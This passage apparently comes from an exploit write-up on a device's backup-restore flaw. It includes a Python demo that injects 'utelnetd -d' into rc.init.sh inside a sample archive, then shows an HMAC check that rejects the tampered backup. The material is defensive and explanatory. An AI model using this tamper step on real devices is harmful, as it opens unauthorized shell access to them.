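The root cause described above is that the restore function accepts any tar.gz the client sends and later executes rc.init.sh from it, with nothing tying the archive to what the device originally exported. The following is an added example, not part of this exploit or of the vendor firmware: it performs the same tamper step as the script (append a command to rc.init.sh and re-pack) entirely in memory on a constructed sample archive, and then shows the kind of check a restore routine would need to reject it: an HMAC over the whole archive under a key the device holds, so a client that can edit the archive still cannot produce a valid tag. The archive layout (backup/rc.init.sh) follows the exploit; the file contents, the key and the "utelnetd -d" command are assumptions for the demo.

```python
import hashlib
import hmac
import io
import tarfile

# Constructed sample of a clean startup script; not the real firmware's content.
CLEAN_RC_INIT = b"#!/bin/sh\n# start services\n/usr/sbin/httpd &\n"


def build_backup(files):
    """Pack {path: bytes} into an in-memory .tar.gz and return its bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_backup(blob):
    """Unpack an in-memory .tar.gz into {path: bytes} without touching disk."""
    files = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                files[member.name] = tar.extractfile(member).read()
    return files


def inject_startup_command(blob, command, script="backup/rc.init.sh"):
    """The exploit's tamper step, in memory: append a line to rc.init.sh and repack."""
    files = read_backup(blob)
    files[script] = files[script] + b"\n" + command.encode() + b"\n"
    return build_backup(files)


# --- the integrity check the device lacks ------------------------------------

def tag_backup(blob, key):
    """HMAC-SHA256 over the whole archive, keyed with a secret only the device holds."""
    return hmac.new(key, blob, hashlib.sha256).hexdigest()


def verify_backup(blob, tag, key):
    """Constant-time comparison; any changed byte in the archive invalidates the tag."""
    return hmac.compare_digest(tag_backup(blob, key), tag)


def added_lines(clean_blob, suspect_blob, script="backup/rc.init.sh"):
    """Non-empty lines in the suspect archive's startup script that the clean one lacks."""
    clean = read_backup(clean_blob)[script].splitlines()
    suspect = read_backup(suspect_blob)[script].splitlines()
    return [line for line in suspect if line.strip() and line not in clean]


if __name__ == "__main__":
    key = b"device-held-secret-constructed-for-demo"  # assumption: kept on the device
    clean = build_backup({"backup/rc.init.sh": CLEAN_RC_INIT, "backup/config.xml": b"<config/>"})
    tag = tag_backup(clean, key)  # would be emitted alongside the export
    evil = inject_startup_command(clean, "utelnetd -d")
    print("clean archive verifies:   ", verify_backup(clean, tag, key))
    print("tampered archive verifies:", verify_backup(evil, tag, key))
    print("injected into rc.init.sh: ", added_lines(clean, evil))
```

The tag has to be something the client cannot recompute: a keyed MAC under a device-held secret, or a signature the vendor produces, both checked before anything from the archive is written to flash. A plain hash or a manifest stored inside the archive does not help, since whoever edits rc.init.sh can update it too.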